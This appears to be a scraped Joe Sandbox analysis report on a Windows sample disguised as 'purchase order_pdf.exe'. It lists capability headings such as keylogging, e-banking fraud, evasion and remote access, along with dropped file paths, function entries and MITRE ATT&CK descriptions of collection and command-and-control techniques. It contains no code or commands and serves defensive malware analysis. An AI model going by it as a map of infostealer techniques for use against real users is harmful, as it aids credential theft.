Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut50A3.tmp

C:\Users\user\AppData\Local\Temp\aut50D3.tmp

C:\Users\user\AppData\Local\Temp\maneuverability

C:\Users\user\AppData\Local\Temp\orographically

C:\Users\user\AppData\Local\Temp\x1j09f428

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
purchase order_pdf.exe

Function 00873B4C Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153
windowCOMMON

Function 00874AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Function 00874FE9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Function 008D93DF Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Function 00873015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 71
windowregistryCOMMON

Function 00873041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Function 008771EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00873A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Function 00873633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Function 00873778 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Function 03642640 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 008739E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 036423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 166
fileCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre